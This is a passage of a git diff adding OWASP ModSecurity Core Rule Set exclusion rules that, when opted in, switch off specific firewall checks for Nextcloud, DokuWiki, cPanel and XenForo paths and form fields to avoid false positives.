a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf new file mode 100644 index 000000000..3b63b47e2 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf 
@@ -0,0 +1,416 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+#
+# ------------------------------------------------------------------------
+
+# These exclusions remedy false positives in a default NextCloud install.
+# They will likely work with OwnCloud too, but you may have to modify them.
+# The exclusions are only active if crs_exclusions_nextcloud=1 is set.
+# See rule 900130 in crs-setup.conf.example for instructions.
+#
+# To relax upload restrictions for only the php files that need it,
+# you put something like this in crs-setup.conf:
+#
+# SecRule REQUEST_FILENAME "@rx /(?:remote.php|index.php)/" \
+# "id:9003330,\
+# phase:1,\
+# t:none,\
+# nolog,\
+# pass,\
+# tx.restricted_extensions='.bak/ .config/ .conf/'"
+#
+# Large uploads can be modified with SecRequestBodyLimit. Or they
+# can be more controlled by using the following:
+#
+# SecRule REQUEST_URI "@endsWith /index.php/apps/files/ajax/upload.php" \
+# "id:9003610,\
+# phase:1,\
+# t:none,\
+# nolog,\
+# ctl:requestBodyLimit=1073741824"
+#
+# ---------------------
+
+
+SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \
+ "id:9003000,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-NEXTCLOUD"
+
+SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \
+ "id:9003001,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-NEXTCLOUD"
+
+
+#
+# [ File Manager ]
+#
+#
+# The web interface uploads files, and interacts with the user.
+
+SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \
+ "id:9003100,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveByTag=attack-injection-php,\
+ ctl:ruleRemoveById=941000-942999,\
+ ctl:ruleRemoveById=951000-951999,\
+ ctl:ruleRemoveById=953100-953130,\
+ ctl:ruleRemoveById=920420,\
+ ctl:ruleRemoveById=920440,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Skip PUT parsing for invalid encoding / protocol violations in binary files.
+
+SecRule REQUEST_METHOD "@streq PUT" \
+ "id:9003105,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \
+ "t:none,\
+ ctl:ruleRemoveById=920000-920999,\
+ ctl:ruleRemoveById=932000-932999,\
+ ctl:ruleRemoveById=921150,\
+ ctl:ruleRemoveById=930110,\
+ ctl:ruleRemoveById=930120"
+
+# Allow the data type 'text/vcard'
+
+SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \
+ "id:9003110,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'"
+
+# Allow the data type 'application/octet-stream'
+
+SecRule REQUEST_METHOD "@rx ^(?:PUT|MOVE)$" \
+ "id:9003115,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule REQUEST_FILENAME "@rx /remote\.php/dav/(?:files|uploads)/" \
+ "setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |application/octet-stream|'"
+
+# Allow data types like video/mp4
+
+SecRule REQUEST_METHOD "@streq PUT" \
+ "id:9003116,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule REQUEST_FILENAME "@rx (?:/public\.php/webdav/|/remote\.php/dav/uploads/)" \
+ "ctl:ruleRemoveById=920340,\
+ ctl:ruleRemoveById=920420"
+
+
+# Allow characters like /../ in files.
+# Allow all kind of filetypes.
+# Allow source code.
+
+SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \
+ "id:9003120,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveById=930100-930110,\
+ ctl:ruleRemoveById=951000-951999,\
+ ctl:ruleRemoveById=953100-953130,\
+ ctl:ruleRemoveById=920440,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Allow REPORT requests without Content-Type header (at least the iOS app does this)
+
+SecRule REQUEST_METHOD "@streq REPORT" \
+ "id:9003121,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ chain"
+ SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \
+ "t:none,\
+ ctl:ruleRemoveById=920340"
+
+
+# [ Searchengine ]
+#
+# NexCloud uses a search field for filename or content queries.
+
+SecRule REQUEST_FILENAME "@contains /index.php/core/search" \
+ "id:9003125,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:query,\
+ ctl:ruleRemoveTargetById=941000-942999;ARGS:query,\
+ ctl:ruleRemoveTargetById=932000-932999;ARGS:query,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+# [ DAV ]
+#
+# NextCloud uses DAV methods with index.php and remote.php to do many things
+# The default ones in ModSecurity are: GET HEAD POST OPTIONS
+#
+# Looking through the code, and via testing, I found these:
+#
+# File manager: PUT DELETE MOVE PROPFIND PROPPATCH
+# Calendars: REPORT
+# Others in the code or js files: PATCH MKCOL MOVE TRACE
+# Others that I added just in case, and they seem related:
+# CHECKOUT COPY LOCK MERGE MKACTIVITY UNLOCK.
+
+SecRule REQUEST_FILENAME "@rx /(?:remote|index|public)\.php/" \
+ "id:9003130,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT PATCH CHECKOUT COPY DELETE LOCK MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH UNLOCK REPORT TRACE jsonp'"
+
+
+# We need to allow DAV methods for sharing files, and removing shares
+# DELETE - when the share is removed
+# PUT - when setting a password / expiration time
+
+SecRule REQUEST_FILENAME "@rx /ocs/v[0-9]+\.php/apps/files_sharing/" \
+ "id:9003140,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT DELETE'"
+
+
+# [ Preview and Thumbnails ]
+
+SecRule REQUEST_FILENAME "@contains /index.php/core/preview.png" \
+ "id:9003150,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetById=932150;ARGS:file,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Filepreview for trashbin
+
+SecRule REQUEST_FILENAME "@contains /index.php/apps/files_trashbin/ajax/preview.php" \
+ "id:9003155,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetById=932150;ARGS:file,\
+ ctl:ruleRemoveTargetById=942190;ARGS:file,\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@rx /index\.php/(?:apps/gallery/thumbnails|logout$)" \
+ "id:9003160,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetById=941120;ARGS:requesttoken,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+# [ Ownnote ]
+
+SecRule REQUEST_FILENAME "@contains /index.php/apps/ownnote/" \
+ "id:9003300,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveById=941150,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+# [ Text Editor ]
+#
+# This file can save anything, and it's name could be lots of things.
+
+SecRule REQUEST_FILENAME "@contains /index.php/apps/files_texteditor/" \
+ "id:9003310,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filecontents,\
+ ctl:ruleRemoveTargetById=921110-921160;ARGS:filecontents,\
+ ctl:ruleRemoveTargetById=932150;ARGS:filename,\
+ ctl:ruleRemoveTargetById=920370-920390;ARGS:filecontents,\
+ ctl:ruleRemoveTargetById=920370-920390;ARGS_COMBINED_SIZE,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+# [ Address Book ]
+#
+# Allow the data type 'text/vcard'
+
+SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \
+ "id:9003320,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'"
+
+# Allow modifying contacts via the web interface
+SecRule REQUEST_METHOD "@streq PUT" \
+ "id:9003321,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ chain"
+ SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \
+ "t:none,\
+ ctl:ruleRemoveById=200002"
+
+
+# [ Calendar ]
+#
+# Allow the data type 'text/calendar'
+
+SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \
+ "id:9003330,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/calendar|'"
+
+# Allow modifying calendar events via the web interface
+SecRule REQUEST_METHOD "@streq PUT" \
+ "id:9003331,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ chain"
+ SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \
+ "t:none,\
+ ctl:ruleRemoveById=200002"
+
+
+# [ Notes ]
+#
+# We want to allow a lot of things as the user is
+# allowed to note on anything.
+
+SecRule REQUEST_FILENAME "@contains /index.php/apps/notes/" \
+ "id:9003340,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveByTag=attack-injection-php,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+# [ Bookmarks ]
+#
+# Allow urls in data.
+
+SecRule REQUEST_FILENAME "@contains /index.php/apps/bookmarks/" \
+ "id:9003350,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveById=931130,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+#
+# [ Login forms ]
+#
+
+# This removes checks on the 'password' and related fields:
+
+# User login password.
+
+SecRule REQUEST_FILENAME "@contains /index.php/login" \
+ "id:9003400,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetById=941100;ARGS:requesttoken,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Reset password.
+
+SecRule REQUEST_FILENAME "@endsWith /index.php/login" \
+ "id:9003410,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@streq resetpass" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"
+
+# Change Password and Setting up a new user/password
+
+SecRule REQUEST_FILENAME "@endsWith /index.php/settings/users" \
+ "id:9003500,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:newuserpassword,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+SecMarker "END-NEXTCLOUD-ADMIN"
+
+SecMarker "END-NEXTCLOUD"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf
new file mode 100644
index 000000000..048d421f3
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf
@@ -0,0 +1,273 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+#
+# ------------------------------------------------------------------------
+
+# These exclusions remedy false positives in a default Dokuwiki install.
+# The exclusions are only active if crs_exclusions_dokuwiki=1 is set.
+# See rule 900130 in crs-setup.conf.example for instructions.
+#
+# Note, if you want to relax the upload restrictions,
+# see rule 900240. For Dokuwiki you can limit the exception
+# to the ajax.php file:
+#
+# SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" ...
+#
+
+
+SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \
+ "id:9004000,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-DOKUWIKI"
+
+SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \
+ "id:9004001,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-DOKUWIKI"
+
+
+#
+# -=[ Dokuwiki Front-End ]=-
+#
+# Note on files specified:
+# /doku.php: shows pages, saves, edits, admin
+# /lib/exe/ajax.php: autosave, uploads
+#
+# Allow pages to be edited, and ajax to save drafts.
+#
+# ARGS 'wikitext', 'suffix', and 'prefix' must allow the same things,
+# as the page (in part or whole) is passed via 'suffix/prefix' at times.
+# attack-protocol (921110-921160/920230): Allows odd characters on the page.
+# CRS: (still need attack-protocol specified.)
+# attack-injection-php (930000-933999): Allows code on page.
+# attack-sqli (940000-942999): Allows SQL expressions on page.
+#
+# Others:
+# 930100-930110;REQUEST_BODY: if there's a /../ in the text.
+#
+# ARGS:summary (the text in the 'summary' box on page edits.):
+# Allowing 930120-930130 lets user save summaries with
+# system file names. This should not be needed in normal
+# use. But leaving a note here of how to allow in rule below:
+# ctl:ruleRemoveTargetById=930120;ARGS:summary
+# ctl:ruleRemoveTargetById=930130;ARGS:summary
+#
+# Also, can't specify:
+# SecRule ARGS:do "@streq edit" \
+# SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php"\
+# because at times the do=edit can get dropped, so if we use
+# above the edit will get blocked when the page is saved.
+
+# Hint: those using .htaccess rewrites can remove/replace
+# this first 'SecRule...' line with 'SecAction \' (unsupported).
+
+SecRule REQUEST_FILENAME "@rx (?:/doku.php|/lib/exe/ajax.php)$" \
+ "id:9004100,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule REQUEST_METHOD "@streq POST" \
+ "t:none,\
+ chain"
+ SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:wikitext,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:wikitext,\
+ ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:suffix,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:suffix,\
+ ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:prefix,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:prefix,\
+ ctl:ruleRemoveTargetById=930100-930110;REQUEST_BODY"
+
+
+# Allow it to upload files. But check for cookies just to make sure.
+
+SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" \
+ "id:9004110,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ noauditlog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule REQUEST_METHOD "@streq POST" \
+ "t:none,\
+ chain"
+ SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \
+ "t:none,\
+ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type}|application/octet-stream'"
+
+
+# Show the index, even if things like "postgresql" or other things show up.
+
+SecRule REQUEST_FILENAME "@endsWith /doku.php" \
+ "id:9004130,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ noauditlog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:do "@streq index" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:do "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveById=951240,\
+ ctl:ruleRemoveById=953110"
+
+
+#
+# [ Login form ]
+#
+
+# Turn off checks for password.
+
+SecRule REQUEST_FILENAME "@endsWith /doku.php" \
+ "id:9004200,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ noauditlog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:do "@streq login" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:do "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:p"
+
+
+#
+# [ Admin Area ]
+#
+# Skip this section for performance unless do=admin is in request
+
+SecRule ARGS:do "!@streq admin" \
+ "id:9004300,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-DOKUWIKI-ADMIN"
+
+SecRule ARGS:do "!@streq admin" \
+ "id:9004310,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-DOKUWIKI-ADMIN"
+
+
+# [ Reset password ]
+#
+# Turn off checks for pass1, pass1-text, pass2
+
+SecRule REQUEST_FILENAME "@endsWith /doku.php" \
+ "id:9004320,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ noauditlog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:do "@streq login" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:do "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"
+
+
+# [ Save config ]
+#
+# Allow the config to be saved:
+# 942200: If the user adds "..." to tagline: ARGS:config[tagline]
+# 942430: if ARGS:config[hidepages] has pages looking like sql statements
+# 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature]
+
+SecRule REQUEST_FILENAME "@endsWith /doku.php" \
+ "id:9004370,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ noauditlog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:page "@streq config" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:page "@eq 1" \
+ "t:none,\
+ chain"
+ SecRule REQUEST_METHOD "@streq POST" \
+ "t:none,\
+ chain"
+ SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=920230;ARGS:config[dformat],\
+ ctl:ruleRemoveTargetById=942200;ARGS:config[tagline],\
+ ctl:ruleRemoveTargetById=942430;ARGS:config[hidepages],\
+ ctl:ruleRemoveTargetById=942430-942440;ARGS:config[signature]"
+
+
+# When the config loads after a save, it gets blocked because
+# it has 'readdir' and lines that look like sql
+# 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature]
+# 951240,953110: When the page reloads, it triggers
+# postgres and php code disclosure rules.
+
+SecRule REQUEST_FILENAME "@endsWith /doku.php" \
+ "id:9004380,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ noauditlog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:page "@streq config" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:page "@eq 1" \
+ "t:none,\
+ chain"
+ SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \
+ "t:none,\
+ ctl:ruleRemoveById=951240,\
+ ctl:ruleRemoveById=953110"
+
+
+# End [ Admin Area ]
+
+SecMarker "END-DOKUWIKI-ADMIN"
+
+SecMarker "END-DOKUWIKI"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf
new file mode 100644
index 000000000..5bc280327
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf
@@ -0,0 +1,64 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+# These exclusions remedy false positives in a default cPanel environment.
+# The exclusions are only active if crs_exclusions_cpanel=1 is set.
+# See rule 900130 in crs-setup.conf.example for instructions.
+
+
+SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \
+ "id:9005000,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-CPANEL"
+
+SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \
+ "id:9005001,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-CPANEL"
+
+
+#
+# [ cPanel whm-server-status ]
+#
+# Cpanel's WHM auto generates requests to /whm-server-status from
+# 127.0.0.1 (triggers rule 920280, non-blocking, log only) Once every 5 minutes.
+# These false positives have a low impact (logged, non-blocking) to a large number of users (all cPanel admins).
+#
+
+#
+# Rule to allow cPanel whm-server-status requests from localhost without log entry.
+#
+SecRule REQUEST_LINE "@rx ^GET /whm-server-status(?:/|/\?auto)? HTTP/[12]\.[01]$" \
+ "id:9005100,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-apache',\
+ tag:'attack-generic',\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
+ "t:none,\
+ ctl:ruleRemoveById=920280,\
+ ctl:ruleRemoveById=920350"
+
+
+SecMarker "END-CPANEL"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf
new file mode 100644
index 000000000..969caaaf3
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf
@@ -0,0 +1,587 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# These exclusions remedy false positives in a default XenForo install. +# The exclusions are only active if crs_exclusions_xenforo=1 is set. +# See rule 900130 in crs-setup.conf.example for instructions. + +SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ + "id:9006000,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-XENFORO" + +SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ + "id:9006001,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-XENFORO" + + +# +# -=[ XenForo Front-End ]=- +# + +# Proxy for images and remote content embedded in forum posts +# GET /xf/proxy.php?image=https://example.com/some.jpg&hash=foo +# GET /xf/proxy.php?link=https://example.com&hash=foo +# POST /xf/proxy.php, body: referrer=... 
+SecRule REQUEST_FILENAME "@endsWith /proxy.php" \ + "id:9006100,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:image,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:link,\ + ctl:ruleRemoveTargetById=931130;ARGS:referrer,\ + ctl:ruleRemoveTargetById=942230;ARGS:referrer,\ + ver:'OWASP_CRS/3.3.5'" + +# Store drafts for private message, forum post, thread reply +# POST /xf/conversations/draft +# POST /xf/conversations/convo-title.12345/draft +# POST /xf/forums/forum-title.12345/draft +# POST /xf/threads/thread-title-%E2%98%85.12345/draft +# +# attachment_hash_combined example: +# {"type":"post","context":{"post_id":12345},"hash":"0123456789abcdef..."} +SecRule REQUEST_FILENAME "@rx /(?:conversations|(?:conversations|forums|threads)/.*)/draft$" \ + "id:9006110,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=931130;ARGS:href,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\ + ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ + ver:'OWASP_CRS/3.3.5'" + +# Send PM, edit post, create thread, reply to thread +# POST /xf/conversations/add +# POST /xf/conversations/add-preview +# POST /xf/conversations/messages/1463947/edit +# POST /xf/posts/12345/edit +# POST /xf/posts/12345/preview +# POST /xf/conversations/convo-title.12345/add-reply +# POST /xf/threads/thread-title.12345/add-reply +# POST /xf/threads/thread-title.12345/reply-preview +# POST /xf/forums/forum-title.12345/post-thread +# POST /xf/forums/blogs/post-thread +# POST /xf/forums/forum-title.12345/thread-preview +SecRule REQUEST_FILENAME "@rx 
/(?:conversations/add(?:-preview)?|conversations/messages/\d+/edit|posts/\d+/(?:edit|preview)|(?:conversations|threads)/.*\.\d+/(?:add-reply|reply-preview)|forums/.*/(?:post-thread|thread-preview))$" \ + "id:9006120,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\ + ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ + ver:'OWASP_CRS/3.3.5'" + +# Quote +# POST /xf/posts/12345/quote +SecRule REQUEST_FILENAME "@rx /posts/\d+/quote$" \ + "id:9006130,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quoteHtml,\ + ver:'OWASP_CRS/3.3.5'" + +# Multi quote +# POST /xf/conversations/convo-title.12345/multi-quote +# POST /xf/threads/thread-title.12345/multi-quote +# quotes={"12345":["quote-html"]} +SecRule REQUEST_FILENAME "@rx /(?:conversations|threads)/.*\.\d+/multi-quote$" \ + "id:9006140,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quotes,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[0][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[1][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[2][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[3][value],\ + 